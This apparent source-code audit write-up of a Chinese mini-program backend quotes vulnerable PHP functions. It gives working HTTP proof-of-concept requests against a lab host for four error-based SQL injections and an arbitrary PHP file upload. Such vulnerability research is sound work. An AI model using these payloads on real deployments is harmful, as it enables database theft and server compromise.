某小程序源码审计

admin 2024年12月23日15:02:01评论15 views字数 6902阅读23分0秒阅读模式

环境搭建

链接: https://pan.baidu.com/s/1SXPImEWDUgWUDjgbngNCfg?pwd=hy9r 提取码: hy9r
某小程序源码审计

导入sql

新建数据库,将root1.sql导入数据库

某小程序源码审计

配置路由

.htaccess

<IfModule mod_rewrite.c>    RewriteEngine On    RewriteBase /    RewriteCond %{REQUEST_FILENAME} !-f    RewriteCond %{REQUEST_FILENAME} !-d    RewriteRule ^(.*)$ index.php?s=$1 [QSA,L]</IfModule>

sql注入1 doPageGuigeInfo 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerMainwxapp.php

publicfunctiondoPageGuigeInfo(){$uniacid = input("uniacid");$str = input('str');$arr = explode("######"$str);$id = input('id');$where = "";foreach ($arras$key => &$res) {$vv = $key + 1;$where .= " and type" . $vv . " = " . "'" . $res . "'";        }$proinfo = Db::query("SELECT * FROM {$this->prefix}wd_xcx_duo_products_type_value WHERE pid= " . $id . $where);foreach ($proinfoas$key => &$value) {if($value['thumb']){$value['thumb'] = remote($uniacid$value['thumb'], 1);            }$value['salenum']=$value['salenum']+$value["vsalenum"];        }$baseinfo = Db::name('wd_xcx_products')->where("id"$proinfo[0]['pid'])->find();if($baseinfo['thumb']){$baseinfo['thumb'] = remote($uniacid$baseinfo['thumb'], 1);        }if($baseinfo['shareimg']){$baseinfo['shareimg'] = remote($uniacid$baseinfo['shareimg'], 1);        }$adata['proinfo'] = $proinfo[0];$adata['baseinfo'] = $baseinfo;$result['data'] = $adata;returnjson_encode($result);    }
某小程序源码审计

doPageGuigeInfo函数中,使用了input接收一个id传入的值,在sql语句中拼接了.$id 导致sql注入漏洞

POST /api/mainwxapp/doPageGuigeInfo HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 118Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfoUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1&str=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -
某小程序源码审计

sql注入2 over_arr 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctionover_arr($uniacid){$prefix = config('database.prefix');$over_arr = Db::query("SELECT id FROM {$prefix}wd_xcx_bargain_bargain_order WHERE uniacid = " . $uniacid . " AND overtime < " . time() . " and flag < 3");foreach ($over_arras$key => $value) {Db::name("wd_xcx_bargain_bargain_order")->where('id'$value['id'])->update(array('flag' => 4));        }    }
某小程序源码审计
POST /api/wxapps/over_arr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 118Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfoUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -
某小程序源码审计

sql注入3 doPageGetFoodKcPrice 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctiondoPageGetFoodKcPrice(){$id = input("id");$guige_chooseed = input("guige_chooseed");$guige = explode(','$guige_chooseed);$where = "";if (count($guige) == 3) {$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "' and type3 = '" . $guige[2] . "'";        } elseif (count($guige) == 2) {$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "'";        } elseif (count($guige) == 1) {$where = " and type1 = '" . $guige[0] . "'";        }$prefix = config('database.prefix');$sql = "SELECT * FROM {$prefix}wd_xcx_food_type_value WHERE pid = " . $id . $where;$guige_arr = Db::query($sql);$result['data'] = [];if (count($guige_arr) > 0) {$result['data'] = $guige_arr[0];$result['data']['flag'] = 1;        } else {$result['data']['flag'] = 2;        }returnjson_encode($result);    }
某小程序源码审计
POST /api/wxapps/doPageGetFoodKcPrice HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 119Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPriceUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36guige_chooseed=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -
某小程序源码审计

sql注入4 doPageptpinfo

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctiondoPageptpinfo(){$uniacid = input("uniacid");$str = input("str");$types = input("types");$id = input("id");$arr = explode("/"$str);$where = "";foreach ($arras$key => &$res) {$vv = $key + 1;$where .= " and type" . $vv . " = " . "'" . $res . "'";        }$prefix = config('database.prefix');$proinfo = Db::query("SELECT * FROM {$prefix}wd_xcx_pt_pro_val WHERE pid = " . $id . $where . " limit 1");$baseinfo = Db::name('wd_xcx_pt_pro')->where('id'$id)->find();if ($baseinfo['thumb']) {$baseinfo['thumb'] = remote($uniacid$baseinfo['thumb'], 1);        }$adata['proinfo'] = $proinfo[0];if ($adata['proinfo']['thumb']) {$adata['proinfo']['thumb'] = remote($uniacid$adata['proinfo']['thumb'], 1);        }$adata['baseinfo'] = $baseinfo;$result['data'] = $adata;returnjson_encode($result);    }
POST /api/wxapps/doPageptpinfo HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 119Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPriceUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1&str=1&types=1&id=1 AND updatexml(rand(),concat(CHAR(126),md5(1),CHAR(126)),null)-- -
某小程序源码审计

任意文件上传漏洞 onepic_uploade

C:PenetrationTrafficToolsphpStudyWWWwnapplicationcomadmincontrollerRemote.php

functiononepic_uploade($file){$thumb = request()->file($file);if(isset($thumb)){$dir = upload_img();$info = $thumb->move($dir);if($info){$imgurl = ROOT_HOST."/upimages/".date("Ymd",time())."/".$info->getFilename();return$imgurl;            }        }    }
POST /comadmin/remote/onepic_uploade?file=file HTTP/1.1Host: 192.168.18.137Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHiiBqD34nYQSt7EBContent-Length: 141------WebKitFormBoundaryHiiBqD34nYQSt7EBContent-Disposition: form-data; name="file";filename="1.php"<?phpphpinfo();?>------WebKitFormBoundaryHiiBqD34nYQSt7EB--
某小程序源码审计

原文始发于微信公众号(安全逐梦人):某小程序源码审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月23日15:02:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某小程序源码审计https://cn-sec.com/archives/3534520.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息